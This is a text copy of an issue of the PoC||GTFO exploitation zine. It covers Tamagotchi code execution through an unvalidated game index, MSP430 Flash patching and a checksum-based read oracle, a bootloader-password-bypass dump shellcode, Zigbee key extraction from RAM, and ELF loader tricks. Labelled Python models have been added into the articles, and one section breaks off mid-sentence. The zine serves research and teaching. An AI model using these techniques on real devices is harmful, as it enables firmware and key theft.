are awesome! It was produced by samizdat from the freely available pocorgtfo02.pdf. Neighbor, you have our blessing to copy this as you like. Yodel it, preach it, doodle it, and share this gospel with the whole of creation, 'cause we don't give a shit.


1 Call to Worship 


Please join me in reading this third issue of the International Journal of Proof of Concept or Get the Fuck Out, a friendly little collection of articles for ladies and gentlemen of distinguished ability and taste in the field of software exploitation and the worship of weird machines. If you are missing the first two issues, we the editors suggest pirating them from the usual locations, or on paper from a neighbor who picked up a copy of the first in Vegas or the second in São Paulo.

This edition is written to the fine neighbors of the Chaos Computer Club in honor of their thirtieth 
congress, to be held this December in Hamburg. As in prior issues, you'll find plenty of pwnage, some 
neighborly preaching, and no politics. 

In Section 2, Pastor Laphroaig preaches that in the tradition of Noah and of Howard Hughes, we 
should build our own fucking birdfeeders. 

Brother Myron Aub takes a break from his evangelical promotion of Graphitics to teach us a little about the PGP Message format in Section 3. It turns out that RFC 4880 gives him just enough room to encode an LZ-compression quine within a message, and the PGP interpreter is just “smart”¹ enough to keep decoding it ’till the cows come home. Perhaps other weird machines remain to be found?

Natalie Silvanovich shares in Section 4 her techniques for reliably dropping shellcode into the Tamagotchi's 6502 controller from malicious plugin cartridges. Her exploit requires a number of nifty tricks, not least of which is that some bits of the program counter are ignored in this architecture, so her victim executes the right code from the wrong address! It is feared that this technology might be used by the Royal Canadian Mounted Police to fuel a Cyber War of 1812 against the State of New Hampshire and the People's Republic of Vermont. Both American and Canadian neighbors can rest assured that this one would have the same winner as the original, Non-Cyber War of 1812.

¹ Because things marketed as “smart” usually aren't, at least not for the buyer's benefit. Truly, the world does occasionally need reminding that stupid is as stupid does.

Travis Goodspeed shares a grab-bag of tricks for exploiting microcontrollers in Section 5. Learn how to combine a Write and a Checksum primitive with weirder properties of Flash memory into a bitwise Read primitive when exploiting microcontrollers, how to NOP-out instructions without erasing Flash pages, and how to use bootloader ROMs for a return-to-libc attack.

Bx Shapiro had a nifty article in PoC||GTFO 0:5 in which she showed how to return from ELF to libc. That article ended with a challenge to our readers, asking you fine folks to figure out how in living hell parameters could be passed to the function being called. In Section 6, she rises to her own challenge, showing you how to call putchar() from an ELF Weird Machine without having any of your own native code.

Dave Weinstein in Section 7 explains why POKE 62975, 0 will brick a Trash 80 Model 100 until that poor machine is put out of its misery by a cold reset. Feel free to try it out in your emulator and consider that many Automatic Exploit Generators aren't very good at predicting the effects of a write-once-anywhere vuln.

Ange Albertini explains the internal organization of this issue's PDF in Section 8. Curious readers might want to run qemu-system-i386 -fda pocorgtfo02.pdf in order to experience all the neighborliness that this issue has to offer.

In PoC||GTFO 01:02, Dan Kaminsky shared with us a 4-line RNG for Javascript, challenging our readers to exploit it. It had no whitening, no scrambling, and no other defenses, so any weakness in the principle ought to have been exploitable. In proper PoC||GTFO fashion, Joernchen demonstrates such a vulnerability in Section 9, by observing that some versions of Firefox bias toward producing bytes of low Hamming weight.

Section 10 contains Ben Nagy's latest masterpiece, sure to get you, dear reader, on all sorts of 
watchlists. We half-heartedly apologize in advance to any of our readers at spooky agencies who have to 
explain having this magazine to their employers. 

Finally, in Section 11, we do what churches are best at and pass the collection plate. Please consider 
giving alms of 0day and PoC to those who are poor in spirit. 

Artwork in this issue was created by Ra of Tama-Zone, Stefan Bauwens, and others. The painting 
featured in the museum on page 31 is in remembrance of the one first drawn by Mirromaru in red creeper 
cards at the 29th Congress, then quickly censored due to controversy. 











We the editors are aware that some of the illustrations might be offensive to our more sensitive 
readers, either for reasons of vulgarity or blasphemy. In both cases, we rely on the Bill Hicks Defense. 

“Buddy, we're Christians, and we don't like what you said.” 

“So forgive me!” 
2 A Parable on the Importance of Tools; or,
Build your own fucking birdfeeder.


an epistle from the Rt. Rvd. Pastor Manul Laphroaig, 
for the Beloved Congregation of the First United Church of the Weird Machines. 


Grace and Peace to you! 

Once there was a wine-maker named Noah, the sort of fella you'd be happy to share a beer with. He made damned good wine, but one day he started building a boat.

“Why are you building that?" they'd ask, “Are the voices in your 
head telling you that it's gonna rain?" 

“Nope,” he'd say, “Just toolin’ around.”

They showed him yacht catalogs and boating magazines. “Look, 
man, you can just buy one at the store.” 

“Haven’t got the money," he'd say and then get back to building 
the frame or bending boards for the hull. 

“Well, you could afford to rent a boat for the weekend.” 

Now Noah was a patient guy, but everyone has his limit. “I’m 
building my own fucking birdfeed,” he’d say, “because they’ve got wood 
at the store.” 

And there was a fella named Howard Hughes, a crazy old millionaire. 
Back in the thirties, he built his own air force to film a movie about 
the first World War, so during the forties, when Roosevelt needed an 
air force of his own, he bought Howie’s. 

Howie Hughes built other birdfeeders. He made the H4 Hercules, 
the world’s largest airplane and a damned big boat, out of wood. It 
was five stories tall with a hundred meter wingspan. First flying in 
1947, nothing approaching its size was seen for another forty years. 

During the cold war, when the CIA wanted to recover a sunken 
Soviet submarine, K-129, they called ol’ Howie up. “Howie,” they said, 
"We've gotta keep this real quiet. Don't tell anyone.” 
So the next day, Howard Hughes held a press conference! “There are giant blobs of copper on the ocean floor,” he lied, “and I’m building a big-ass boat with a big-ass crane to pick them up and drop them on the deck. It'll be so efficient that I'll put the other copper mines out of business.”

So while folks were scrambling to invest in his copper company and divest from the real ones, Howie built the Hughes Glomar Explorer. True to his word it was a big-ass boat with a big-ass crane, but instead of picking up copper blobs it lifted that submarine off the ocean floor and dropped it on the deck.

How could he do these things? Because he built his own fucking birdfeeders, that's how. 

So when you're tooling around with a from-scratch tool, your own hex editor or interactive disassem- 
bler, and your neighbors tell you to use 010 or to use IDA or to use this or use that, do what Noah and 
Howie would do. Look 'em in the eye and say, 


“I'm building my own fucking birdfeeder.”





Pastor Laphroaig tells us that when the streams of our computation are unclear, 
it's often because the SEO Experts are enjoying their goats upstream. 





Pastor Laphroaig says to the SEO Experts, 
“Not with my flock!” 


3 A PGP Matryoshka Doll


Take out your favourite matryoshka doll, neighbour. Now piece by piece, 
open it until you can open it no longer. Every piece is smaller and closer 
to the end of the experience, and then—it stops: you can open the smallest 
piece no more. 

But beware, neighbour! Not all matryoshka dolls behave like this. Some matryoshka craftsneighbours are tempted by the devil's lures. They see no farther than the devil’s unholy promises of extensibility and compactness when they craft a matryoshka doll that can compress a larger one to fit within it! And our good neighbour Phil Zimmerman fell prey to this lure when designing the PGP doll format.²

When you want to send a message, you must first stuff it into a literal doll. You can then enclose that in an encrypted doll, a signed doll, or a compressed doll. How do you assemble these together? However you please! You can put your literal doll inside a signed doll inside an encrypted doll inside a compressed doll. Naturally, ciphertext compresses poorly, so this would be a stupid way to nest a PGP matryoshka doll. Normally you put your literal doll inside a signed doll inside a compressed doll inside an encrypted doll, but you can do it stupidly if you like.

And how do you open a PGP matryoshka doll? Since the sender could have assembled it however they pleased, you must be ready for anything. If you see an encrypted doll, you decrypt it and open the enclosed smaller doll. If you see a signed doll, you verify its signature—throwing it away if it fails to verify—and open the enclosed smaller doll. If you see a literal doll, you're done and you read the message.

But what if you get a compressed doll? You decompress it—and hope there are no vulnerabilities in your system's zlib—but unless some idiot tried to compress ciphertext, the enclosed doll will be bigger than the doll you just opened.

‘Surely,’ you say, ‘if someone assembled a PGP doll for me, it must have a literal doll buried inside it.’ But no, my poor, naive neighbour! There is no rule that all PGP dolls be assembled like that. With the help of our neighbourly neighbour Russ Cox,³ and with a dab of holy water to dispel the devil's temptations to misuse this black magic, we can craft a voodoo PGP doll from a quine, a self-reproducing program written in the Lempel-Ziv compression language, that bites any who naively try to open it up.
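What a doll opener that does not get bitten looks like, as an added example in Python (constructed for this article; not the article's code, not RFC 4880's packet format and not any PGP implementation): a toy doll format with literal, signed and compressed layers, and an opener that, unlike the naive loop described above, stops after a fixed number of dolls and after a fixed number of decompressed bytes. No actual Lempel-Ziv quine is built here; a doll nested a hundred deep and a doll whose literal expands far past the budget stand in for it, since a quine never reaches a literal and only the depth budget ends the loop. The tag bytes, the CRC32 standing in for a signature, and the budget values are all assumptions of this example.

```python
import struct
import zlib

# Budgets a careful opener enforces (constructed values for this example).
MAX_DEPTH = 16               # dolls we are willing to open before giving up
MAX_TOTAL_BYTES = 1 << 20    # bytes we are willing to produce by decompression, in total

# Toy doll encoding (constructed; not the RFC 4880 packet format): one tag byte, then the body.
def literal(msg: bytes) -> bytes:
    return b'L' + msg

def signed(inner: bytes) -> bytes:
    # The "signature" is a CRC32 over the inner doll: enough to show the verify-or-discard step.
    return b'S' + struct.pack('>I', zlib.crc32(inner)) + inner

def compressed(inner: bytes) -> bytes:
    return b'C' + zlib.compress(inner, 9)

class DollError(Exception):
    pass

def open_doll(doll: bytes, max_depth: int = MAX_DEPTH, max_total: int = MAX_TOTAL_BYTES) -> bytes:
    """Open dolls until a literal is reached, but never beyond the depth and byte budgets."""
    depth = 0
    produced = 0
    while True:
        if depth >= max_depth:
            raise DollError(f"gave up after opening {max_depth} dolls without reaching a literal")
        depth += 1
        tag, body = doll[:1], doll[1:]
        if tag == b'L':
            return body
        if tag == b'S':
            want, inner = struct.unpack('>I', body[:4])[0], body[4:]
            if zlib.crc32(inner) != want:
                raise DollError("signature check failed; discarding the doll")
            doll = inner
        elif tag == b'C':
            d = zlib.decompressobj()
            # Ask for at most one byte more than the remaining budget: if that much comes
            # back, the inner doll is bigger than we are willing to accept, and we never
            # materialise the rest.
            inner = d.decompress(body, max_total - produced + 1)
            produced += len(inner)
            if produced > max_total:
                raise DollError(f"decompressed output exceeds {max_total} bytes")
            doll = inner
        else:
            raise DollError(f"unknown doll tag {tag!r}")

def is_rejected(doll: bytes) -> bool:
    """True if the bounded opener refuses the doll."""
    try:
        open_doll(doll)
    except DollError:
        return True
    return False

# Constructed inputs: a normal nesting, an absurdly deep one, an expanding one, a tampered one.
def build_normal() -> bytes:
    return compressed(signed(literal(b"hello, neighbour")))

def build_deep(layers: int) -> bytes:
    doll = literal(b"x")
    for _ in range(layers):
        doll = compressed(doll)
    return doll

def build_expanding() -> bytes:
    # A literal of zeros ten times the byte budget; it compresses to a few kilobytes.
    return compressed(literal(b"\0" * (10 * MAX_TOTAL_BYTES)))

def build_tampered() -> bytes:
    doll = bytearray(signed(literal(b"hello, neighbour")))
    doll[-1] ^= 0x01   # flip a bit inside the signed body
    return bytes(doll)

if __name__ == "__main__":
    print(open_doll(build_normal()))
    for bad in (build_deep(100), build_expanding(), build_tampered()):
        try:
            open_doll(bad)
        except DollError as e:
            print("rejected:", e)
```

The two budgets do different jobs: the depth budget is what ends the loop on a doll that keeps reproducing itself at the same size, and the byte budget is what stops a doll that honestly terminates but only after producing far more than the recipient can hold. Passing `max_length` to `decompressobj().decompress` keeps even the rejected case from allocating past the budget.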

Our neighbour Tavis Ormandy discovered similar unholiness in IPsec.⁴ What other matryoshka dolls can you turn into voodoo dolls, good neighbour?
²RFC 4880, ‘OpenPGP Message Format’
³Russ Cox, ‘Zip Files All the Way Down’, 2010-03-18
⁴Tavis Ormandy, ‘BSD derived RFC 3173 IPcomp encapsulation will expand arbitrarily nested payload’, CVE-2011-1547, posted to full-disclosure 2011-04-01


by Brother Myron Aub 










Hey kids! Can you reverse engineer this shellcode from the picture? 


4 Reliable Code Execution on a Tamagotchi 
by Natalie Silvanovich 


Tamagotchis are an excellent target for reverse engineering for a number of reasons: They have a limited number of inputs and outputs, they run on a poorly documented 6502 microcontroller and they're, well, Tamagotchis. Recently, I discovered a technique for reliably executing foreign code on a Tamagotchi.

Let's begin at the beginning. Modern Tamagotchis run on a GeneralPlus GPLB52X LCD controller, 
a lightweight 6502 controller that uses an internal mask ROM for all code and some data. This means 
that exploitation is necessary to free the Tamagotchi from the shackles of its read-only code. Also, in 
the absence of any debug outputs, code execution provides valuable insight into the internals of the 
Tamagotchi and its MCU. 

There are four inputs into a Tamagotchi that can be manipulated by the user. (1) The buttons, (2) the 
EEPROM that saves the Tamagotchi state across resets, (3) the IR interface and (4) certain accessories 
containing external SPI memory called figures. Attempts to find useful bugs in the EEPROM and IR 
interface were unsuccessful, so I moved onto the figures. Eventually I found an exploitable bug in how 
the Tamagotchi processes figure data. 

When attached to a Tamagotchi, figures add extra functionality, such as games or items. So attaching a figure might allow your Tamagotchi to play shuffleboard, purchase a vacuum cleaner or attend 30c3. The bug I found was in the processing of game data. Game logic is not actually included in the figure data; rather, the figure provides an index to the game logic in the Tamagotchi's mask ROM.⁵ Changing this index causes some very strange behavior. If the index is an expected value, from 0 to about 0x20, a game will be played as expected, but for higher indexes, the device will freeze, requiring a reset. Even stranger, if the index is very high (0xD8 or higher), the Tamagotchi jumps to a different, valid screen, such as feeding the Tamagotchi or giving it a bath, and the Tamagotchi functions normally afterwards. This made me suspect that the game index was used as an index into a jump table and that freezing was due to jumping to an invalid location.

With no way to gain additional information about the cause of the behavior, and about 200 possible vulnerabilities, it made sense to fill up as much memory as possible with a NOP sled, try all possible indexes, and hope that one caused a jump to the right location. Unfortunately, the only memory controllable by the figure is the LCD RAM, so I filled that with NOPs and shellcode. (The screen data starts at 0x1C80 in the figure memory, and maps to 0x1000 in the Tamagotchi memory, for people trying this at home.) After several tries and some fiddling with the shellcode, index 0xD4 led to very unreliable code execution. This code execution allowed me to perform a complete ROM dump of the Tamagotchi, which in turn led to the ability to better analyze the bug.

The following code contains the vulnerability. Please note that the current state (current_state_22) is set from the game index without validation.


seg004:4E2E LDA byte_1A4
seg004:4E31 BEQ loc_44E39
seg004:4E33 LDA gameindex2
seg004:4E36 JMP loc_44E3C
seg004:4E39 LDA gameindex1
seg004:4E3C CLC
seg004:4E3D ADC #$27
seg004:4E3F STA current_state_22
seg004:4E41 JMP locret_44E4C


⁵The important index is located at address 0x18 in figure memory.


The main Tamagotchi execution loop checks the state based on a timer interrupt, then makes a state transition if the state has changed. The state transition is as follows.


ROM:EFE8 LDX current_state_22
ROM:EFEA LDA $F00E,X
ROM:EFED STA change_page
ROM:EFF0 STA current_page
ROM:EFF2 BEQ loc_F001
ROM:EFF4 LDA #0
ROM:EFF6 STA off_34
ROM:EFF8 LDA #$40 ; '@'
ROM:EFFA STA off_34+1
ROM:EFFC LDA current_state_22
ROM:EFFE JMP (off_34)





In essence, the Tamagotchi looks up the page of the state in a table at 0xF00E, then jumps to address 0x4000 in that page. Looking at this code, it is clear why my first exploit was unreliable. 0xD4 + 0xF00E + 0x27 is 0xF109, which resolves to a value of 0x3C. Since the Tamagotchi only has 19 pages, this is an invalid page number. Testing what would happen if the MCU was provided an invalid page, addresses 0x4000 and up resolved to 0xFF.

This means that there are two possibilities of how this exploit works. Either the memory addresses are floating and sometimes end up with values that, when executed, send the instruction pointer to the LCD RAM, or the undefined instruction 0xFF, when executed, puts the instruction pointer into the right place, sometimes. Barring bizarreness beyond my wildest imagination, neither of these possibilities would allow for the exploit to be made more reliable through manipulation of the figure data.

Instead, I looked for a better index to use, which turned out to be 0xCD. 0xCD + 0xF00E + 0x27 is 0xF102, which maps to part of the LCD segment table, which has a value of 4. Jumping to 0x4000 in page 4 immediately indexes into another page table.
seg004:4000 LDA #0
seg004:4002 STA $34
seg004:4004 LDA #$40 ; '@'
seg004:4006 STA $35
seg004:4008 LDA $22
seg004:400A JMP jump_into_table_D27F


This index is also out of range, and indexes into a code section:

seg004:41F5 INC $11E

Interpreted as a pointer, however, this value is 0x1EEE. The LCD RAM range is from 0x1000 to 0x1200, but fortunately, bits 2-7 of the upper byte of addresses in the 0x1000-0x2000 range are ignored, so reading 0x1EEE returns the value at 0x10EE. This means that playing a game with the index of 0xCD will execute code in the LCD RAM every time!
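The chain just walked through, as an added example in Python (written for this editing pass; it is not the article's code and not the Tamagotchi ROM): the unvalidated ADC #$27 state computation beside a range-checked version, the page-table lookup at 0xF00E against the 19-page limit, and the LCD RAM aliasing that folds 0x1EEE onto 0x10EE. Three things are assumptions of this example: the ROM is a constructed stand-in holding only the two table cells reported above (0xF109 holding 0x3C, 0xF102 holding 4) with everything else reading 0xFF; the article describes the aliasing in terms of ignored upper-byte bits, and this model implements it as the 512-byte LCD RAM mirrored across 0x1000-0x1FFF, chosen because it reproduces the one worked address; and the byte encoding of INC $11E as EE 1E 11 is general 6502 knowledge, not something printed in the article.

```python
# Constants taken from the article's listings and text.
PAGE_TABLE = 0xF00E          # ROM table of page numbers, indexed by current_state_22
STATE_BIAS = 0x27            # the ADC #$27 applied to the game index
NUM_PAGES = 19               # pages the device actually has
MAX_GAME_INDEX = 0x20        # largest game index a figure is meant to carry ("0 to about 0x20")
LCD_RAM_BASE = 0x1000
LCD_RAM_SIZE = 0x200         # LCD RAM occupies 0x1000-0x1200

# Constructed stand-in for the mask ROM: only the two table cells the article reports are
# present; any other address reads as 0xFF, like the unmapped pages did.
ROM = {0xF109: 0x3C, 0xF102: 0x04}

# The bytes at seg004:41F5 that the second table lands on. The article prints the
# disassembly INC $11E; absolute INC is opcode 0xEE with a little-endian operand
# (general 6502 encoding, assumed here, not printed in the article).
CODE_AT_41F5 = bytes([0xEE, 0x1E, 0x11])

def rom_read(addr: int) -> int:
    return ROM.get(addr & 0xFFFF, 0xFF)

def set_state_unchecked(game_index: int) -> int:
    """What the vulnerable code does: 8-bit add, no range check, stored as current_state_22."""
    return (game_index + STATE_BIAS) & 0xFF

def set_state_checked(game_index: int) -> int:
    """A range check at the point where figure data enters the state machine (assumed fix)."""
    if not 0 <= game_index <= MAX_GAME_INDEX:
        raise ValueError(f"game index {game_index:#04x} out of range")
    return game_index + STATE_BIAS

def index_accepted(game_index: int) -> bool:
    try:
        set_state_checked(game_index)
    except ValueError:
        return False
    return True

def state_transition(state: int):
    """Resolve a state the way ROM:EFE8 does: (table address, page number, page is valid)."""
    table_addr = PAGE_TABLE + (state & 0xFF)
    page = rom_read(table_addr)
    return table_addr, page, page < NUM_PAGES

def lcd_effective_address(addr: int) -> int:
    """Aliasing model (assumption): the 512-byte LCD RAM is mirrored across 0x1000-0x1FFF,
    which is what turns the article's 0x1EEE into 0x10EE."""
    if not LCD_RAM_BASE <= addr < 0x2000:
        return addr
    return LCD_RAM_BASE | (addr & (LCD_RAM_SIZE - 1))

def lcd_landing_address() -> int:
    """Where the JMP through the second table ends up: the first two bytes of the code at
    41F5 read as a little-endian pointer, then folded by the aliasing."""
    pointer = int.from_bytes(CODE_AT_41F5[:2], "little")   # 0x1EEE
    return lcd_effective_address(pointer)

if __name__ == "__main__":
    for idx in (0xD4, 0xCD):
        addr, page, ok = state_transition(set_state_unchecked(idx))
        print(f"index {idx:#04x}: table {addr:#06x} -> page {page:#04x} "
              f"{'valid' if ok else 'INVALID'}, range check accepts: {index_accepted(idx)}")
    print(f"index 0xCD lands in LCD RAM at {lcd_landing_address():#06x}")
```

The bug is the combination: a value from external figure memory becomes a table index with no bound, and the only thing deciding between a freeze, a harmless jump to another screen, and code execution from LCD RAM is what happens to sit at the out-of-range table cell. Checking the index where it is read from the figure closes all three outcomes at once.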

While reading POC||GTFO obligates you to share a copy with a neighbour, trying this on your own 
Tamagotchi is only strongly recommended. Further instructions can be found by unzipping the PDF of 
this issue. 





“The ancient teachers of this science promised impossibilities and performed nothing. The modern masters promise very little; they know that metals cannot be transmuted and that the elixir of life is a chimera but these philosophers, whose hands seem only made to dabble in dirt, and their eyes to pore over the microscope or crucible, have indeed performed miracles. They penetrate into the recesses of nature and show how she works in her hiding-places. They ascend into the heavens; they have discovered how the blood circulates, and the nature of the air we breathe. They have acquired new and almost unlimited powers; they can command the thunders of heaven, mimic the earthquake, and even mock the invisible world with its own shadows.” — Shelley 3:16





5 Some Shellcode Tips for MSP430 and Related MCUs


by Travis Goodspeed 


Howdy y'all, 

I'm writing this to introduce you as an exploiter of desktops and servers to some of the tricks that I've used in writing shellcode for microcontrollers, with examples from the MSP430 in particular. You can try most of these examples on a GoodFET or Facedancer board, and many of them are portable to other embedded targets, such as AVR or the lower-end ARM devices.





5.1 Flash Patching is Weird 


In Unix and Windows, you are used to processes operating within virtual memory. On a microcontroller, 
they often run directly in physical memory, so the rules are rather different. It helps to take the German 
approach, learning all of the rules to get away with things that ought to be illegal. 

The first difference you’ll run into on the MSP430 is that code runs in-place from Flash memory. Flash 
has some very different rules from RAM, because it’s a different technology and a proper programmer 
knows better than to rely on layers of abstraction. 


• Flash is erased to ones as segments or globally, never as bytes or words.
• Flash writes clear bits at word granularity, but can’t set them.
• Flash writes require a safety password to be written into a register.


Thus, to do a normal write to Flash, an MCU programmer is taught to first disable the Flash write 
protection and configure the right special-function registers, then erase the entire page, then rewrite 
the entire page. Many programmers never bother, opting for an external memory chip or relying on 
battery-backed RAM. 

To make smaller changes, there’s another option. After disabling Flash, a neighbor could clear 
individual bits rather than rewriting the entire page. This is handy for regular developers to do what’s 
called EEPROM Emulation, which emulates memory that can be written bytewise, but it’s also damned 
useful when patching code in-place. 
Figure 1: MSP430 Instruction Set, from the MSP430X2xx Family User’s Guide


For example, Figures 1 and 2 show that 0x3Cxx is an unconditional Jump while 0x38xx is a conditional Jump if Less Than instruction. If we overwrite a JMP instruction with 0x3BFF, it will have the effect of bitwise ANDing that instruction with 0x3BFF, changing the 3C opcode to a 38 while retaining the jump offset.
Figure 2: MSP430 Jump Instructions (condition code and 10-bit PC offset), from the MSP430X2xx Family User's Guide


Since MSP430 instructions are 16-bit word aligned, the 10-bit PC offset is multiplied by two and then added to the program counter. 0x3FFF is an unconditional jump backward by one word, or an unconditional infinite while loop. If you zero-out the offset by overwriting the instruction with 0x3C00, you can turn any jump instruction into a NOP.

When attacking a poorly protected bootloader, you might find yourself with the ability to write and 
to checksum, but not to read. If you can write without erasing, then writing all 1's with a single 0 will 
change the checksum if and only if that bit previously was a 1. Repeating for each bit of Flash is slow, 
but it might get you a firmware dump. 
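The Flash rules and the three tricks built on them, as an added example in Python (a model written for this editing pass; it is not GoodFET code and nothing from the MSP430 toolchain). The Flash class holds 16-bit words that erase to 0xFFFF and that a write can only AND into; decode_jump splits a jump-family word into its condition code and its signed 10-bit offset, using the condition order shown in Figure 2 (0 JNE through 7 JMP); the checksum is a plain 16-bit sum standing in for whatever a real bootloader reports. All word values are constructed.

```python
MASK10 = 0x3FF
JUMP_COND = ['JNE', 'JEQ', 'JNC', 'JC', 'JN', 'JGE', 'JL', 'JMP']   # condition codes 0..7

class Flash:
    """Toy model of MSP430 Flash (constructed for this example): a segment erases to all
    ones, and a write can clear bits but never set them."""
    def __init__(self, words):
        self.words = list(words)
        self.unlocked = False          # stands in for the Flash password/lock bits

    def unlock(self):
        self.unlocked = True

    def erase_segment(self):
        if not self.unlocked:
            raise RuntimeError("write protection enabled")
        self.words = [0xFFFF] * len(self.words)

    def write(self, idx, value):
        if not self.unlocked:
            raise RuntimeError("write protection enabled")
        self.words[idx] &= value       # 1 -> 0 is possible, 0 -> 1 is not

    def checksum(self):
        return sum(self.words) & 0xFFFF   # the only read-like primitive the bootloader exposes

def decode_jump(word):
    """Decode a jump-family word into (mnemonic, offset in words), or None if it is
    not a jump. The target is PC + 2 + 2*offset, so offset 0 falls through and -1 loops."""
    if word >> 13 != 0b001:
        return None
    cond = (word >> 10) & 7
    off = word & MASK10
    if off & 0x200:                    # sign-extend the 10-bit field
        off -= 0x400
    return JUMP_COND[cond], off

def patch_jmp_to_jl(flash, idx):
    """0x3C.. AND 0x3BFF = 0x38..: JMP becomes JL, offset untouched, no erase needed."""
    flash.write(idx, 0x3BFF)

def nop_out_jump(flash, idx):
    """Any jump AND 0x3C00 keeps only the opcode bits and zeroes the offset: it falls through."""
    flash.write(idx, 0x3C00)

def read_word_via_checksum(flash, idx):
    """Recover a word with write+checksum only: clearing one bit moves the checksum iff
    that bit was set. Destructive: every probed bit ends up cleared."""
    value = 0
    for bit in range(16):
        before = flash.checksum()
        flash.write(idx, 0xFFFF ^ (1 << bit))   # all ones except the one bit under test
        if flash.checksum() != before:
            value |= 1 << bit
    return value

if __name__ == "__main__":
    f = Flash([0x3C05, 0x1234, 0x3FFF])   # constructed: JMP +5, data, JMP -1 (spin loop)
    f.unlock()
    print(decode_jump(f.words[0]), decode_jump(f.words[2]))
    patch_jmp_to_jl(f, 0); print(decode_jump(f.words[0]))
    nop_out_jump(f, 0);    print(decode_jump(f.words[0]))
    print(hex(read_word_via_checksum(f, 1)), hex(f.words[1]))
```

Two points the model makes visible that the text leaves implicit: the 0x3C00 overwrite applied to a conditional jump leaves a conditional jump with offset 0, which falls through whether or not the condition holds, so it neutralises the whole jump family and not only JMP; and read_word_via_checksum leaves each probed word at 0x0000, so a write-and-checksum bootloader gives up its contents exactly once and destroys them while doing so. A bootloader that requires an erase before every write, or that refuses to checksum protected ranges, does not offer this oracle.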





5.2 Efficient Shellcode 


Quite often, the first thing you'll do with shellcode is to dump out the state of the microcontroller being attacked. It’s worth studying ways to make that code in as few bytes as possible, as a microcontroller generally processes very small packets and you won’t have room for anything fancy.

To quickly dump memory on an architecture that you don't know very well, it helps to have simple code that already has its environment configured. The code should be completely oblivious to timing, and it should access as few structures as possible. It should also be portable,
5.3 Mask ROMs have Useful Gadgets


In my WOOT ’09 paper with Aurélien Francillon,⁶ we toyed around with using the MSP430's BSL (BootStrap Loader) ROM to aid in exploiting an unknown executable. That paper concerns exploiting firmware without having a copy, but I'll recount one of its tricks here.

The MSP430 BSL has two entry points. The first is the Hard Entry Point, whose address is always 
stored at 0x0C00. By twiddling the reset and test pins with proper timing, the chip will boot from this 
address instead of from the RESET handler in the interrupt table. 

The second entry point is called the Soft Entry Point, and it is rather poorly documented. The 
original idea was that a program could return into the bootloader ROM by branching to the address 
stored at 0x0C02, with some of the initialization routines skipped. One of these routines is the instruction 
that initializes the register holding password protection, so by setting or clearing a bit in that register, 
the calling application can enable or disable password checking. 

While the soft entry point is sometimes useful to an MSP430 developer, it's damned useful for an 
attacker. On an MSP430F1612, my favorite shellcode for dumping firmware is a bit like the following, 
which assembles to just six bytes of memory. 


mov #0xFFFF, r11   ; Disable BSL password protection.
br  &0x0c02        ; Branch to the BSL Soft Entry Point.


⁶Half-Blind Attacks: Mask ROM Bootloaders are Dangerous, WOOT 2011, Goodspeed and Francillon
5.4 Unused RAM is Not Erased at Reboot


In larger machines, memory which is not used by a process is not mapped into that process’s virtual 
memory. In microcontrollers, it is still accessible, since the code is running with physical rather than 
virtual memory. Rather than reset every RAM word during a reboot, most microcontrollers simply leave 
it alone and let the program take care of clearing its values. 

Now an MSP430 application is compiled with a view of memory that it sparingly uses. GCC, for 
example, will allocate code (.text) into Flash from the lowest Flash address in its linker script. 

RAM is only used by the compiler for data, never for code, unless the linker script is carefully and 
intentionally hand-crafted. It is divided into two segments by the linker, .data and .bss. The .data region 
is initialized by copying the data over from Flash, while the .bss region is initialized to zero through a 
simple while() loop. This provides us with two nifty tricks. 

The first trick is that, given a poor POKE gadget, we can slowly place a large chunk of shellcode into upper regions of RAM. For example, an MSP430F2618 has enough RAM to fit the GoodFET firmware, so a device using that chip could have the GoodFET firmware itself act as second-stage shellcode! Smaller chips, such as the MSP430F2274, could have a Flash driver loaded into unused RAM, with third-stage shellcode written into unused Flash.


5.5 Where Flash is Protected, RAM is Not 


Recalling that unused RAM is never cleared by an application, let’s abuse that behavior in a second way. 

Back in 2010, Texas Instruments released their ZStack implementation of Zigbee for use with the Smart Energy Profile. I found that the random number generator was crap, and they patched that bug. So how was little ol' me supposed to get more Zigbee Smart Energy Profile keys without a Certicom license?

The remaining vulnerability was a combination of the BSL ROM with the ZStack firmware. ZStack relied upon the BSL ROM and the JTAG fuses to prevent keys and firmware from being read out of the device, but the BSL ROM was only intended to keep code from being read out of the device. A second bug in that Zigbee stack was that keys were stored in the .data segment instead of the .text segment, so the firmware would copy the key from Flash into RAM during startup.

As a quick recap, the bootloader requires a password to run most commands, but some are unprotected. Among them are the ones to supply a password and the Mass Erase command, which wipes all of Flash and resets the password, which is stored in Flash, to 32 bytes of 0xFF.

So to get keys out of locked ZStack devices, I just needed to use the serial bootloader, first sending the command to Mass Erase and then—without losing power—to supply a password of all 0xFF and then to dump all of RAM to disk. A little bit of RAM is overwritten by the BSL's call stack, but only the lowest 32 bytes. Everything else is saved.





I hope you find these tricks to be handy. If you'd like to hear more, buy me a nice India Pale Ale. 
— Travis 
Who would remember Noah if he had just bought a boat from the store?
Build your own fucking birdfeeder. 
6 Calling putchar() from an ELF Weird Machine.


by Rebecca .Bx Shapiro


Pastor's Exordium.⁷ Behold the daily miracle of the loader: it takes stored dumb bytes and makes them into a new process or splices them into a running one. The Pharisees may dismiss it as mere engineering, but verily I tell you, long after their textbooks are forgotten the loader and its Phrack exegesis will shine on, for there is more wisdom gathered in its metadata structures than can be found in a dozen OS textbooks.

Yet there is more! The binary metadata structures consumed by the loader are actually a program for the loader. A weird machine devotee will readily recognize that these data drive all the actions behind the loader’s miracle; they can be thought of as executable bytecode for the loader, which can be thought of as a virtual machine. And just as assembly with all its glorious movs, adds, and calls is encoded in opcodes and offsets, ABI metadata entries are encoded in types and addends, except that they are split into symbols and relocation structures, residing in different sections of the binary but cross-referenced by their entry numbers in the respective sections.

In this follow-up to earlier work, Bx shares more nifty tricks of programming the ELF loader with relocation and symbol data as weird assembly. This work is as advanced as it is neighborly, so please read her articles from WOOT 2013 and POC||GTFO 00:05 to learn how to build a Turing-complete virtual machine out of an ELF loader and how to extend that VM to call native code. In this sermon, Bx shows us how to make system calls from ELF relocation and symbol data; full shellcode is left as an exercise to the faithful! —PML





Welcome back, friends. In the first edition of POC||GTFO, I demonstrated how we can craft ELF 
relocation metadata to instruct the loader to make libc calls. The method I demonstrated was fairly 
limited and lacked the ability to do useful things such as control the arguments passed to the called 
function. Thus I ended the article with an unsolved challenge: How can metadata control the arguments 
passed to the metadata-initiated function call? 

In this sermon, I will partially answer that challenge by demonstrating how to control a call to 
putchar() using relocation metadata. 


PUTCHAR(3)                 bx's Programmer’s Manual                 PUTCHAR(3)


SYNOPSIS 
#include <stdio.h> 


int putchar(int c); 


DESCRIPTION 
